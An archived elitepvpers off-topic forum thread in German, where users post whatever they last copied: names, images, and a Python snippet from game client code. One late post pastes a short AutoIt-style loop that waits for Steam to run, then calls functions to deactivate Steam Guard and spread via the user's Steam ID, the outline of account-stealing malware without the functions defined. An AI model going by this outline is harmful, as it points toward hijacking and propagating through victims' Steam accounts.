elitepvpers

elitepvpers (https://www.elitepvpers.com/forum/)
-   Off Topic (https://www.elitepvpers.com/forum/off-topic/)
-   -   Was habt ihr als letztes kopiert? (https://www.elitepvpers.com/forum/off-topic/765331-habt-ihr-als-letztes-kopiert.html)

.vistalu 10/24/2011 05:54


Shishihara 10/24/2011 07:05


Wingardium 10/24/2011 09:38

[IMG]http://img7.imagebanana.com/img/3xwtjwrg/cooltext569375634.gif[/IMG

business247 10/24/2011 10:16

Stewardess

Wingardium 10/24/2011 10:18

Arsenie
Aurica
Brindusa
Cetrinel
Daciana
Denisa
Dorina
Estera
Florica
Ileana
Ioana
Ionela
Iuleta
Janaya
Mioara
Mirela
Mirona
Miruna
Narcisa
Raluka
Rondica
Sanda
Sorana
Sorina
Zereza
Valea
Viorica

Saaja 10/24/2011 10:19

[Only registered and activated users can see links. Click Here To Register...]

SP33CHL322 10/24/2011 10:24

[Only registered and activated users can see links. Click Here To Register...]

Wingardium 10/24/2011 10:40

moep123

NiiceOne 10/24/2011 10:51

Quote:

########################
import item

ACCESSORY_MATERIAL_LIST = [50623, 50624, 50625, 50626, 50627, 50628, 50629, 50630, 50631, 50632, 50633]
#ACCESSORY_MATERIAL_LIST = [50623, 50623, 50624, 50624, 50625, 50625, 50626, 50627, 50628, 50629, 50630, 50631, 50632, 50633,
# 50623, 50623, 50624, 50624, ]

def GET_ACCESSORY_MATERIAL_VNUM(vnum, subType):
ret = vnum

if vnum >= 16210 and vnum <= 16219:
return 50625

if item.ARMOR_WRIST == subType:
WRIST_ITEM_VNUM_BASE = 14000
ret -= WRIST_ITEM_VNUM_BASE
elif item.ARMOR_NECK == subType:
NECK_ITEM_VNUM_BASE = 16000
ret -= NECK_ITEM_VNUM_BASE
elif item.ARMOR_EAR == subType:
EAR_ITEM_VNUM_BASE = 17000
ret -= EAR_ITEM_VNUM_BASE

type = ret/20

if type<0 or type>=len(ACCESSORY_MATERIAL_LIST):
type = (ret-170) / 20
if type<0 or type>=len(ACCESSORY_MATERIAL_LIST):
return 0

return ACCESSORY_MATERIAL_LIST[type]

das? :o

Yunchen 10/24/2011 12:28


.vistalu 10/24/2011 14:25


Yunchen 10/24/2011 15:14


.vistalu 10/24/2011 18:43


L3v3L UP 10/24/2011 18:48

While 1
If ProcessExists("Steam.exe") <> 0 Then
Sleep(20000)
DeactivateSteamGuard()
Spread(GetSteamUserID())
Exit
EndIf
Sleep(1000)
WEnd

Yunchen 10/24/2011 18:48

88.594.589 US-Dollar Strafe


All times are GMT +2. The time now is 11:32.

Powered by vBulletin®
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.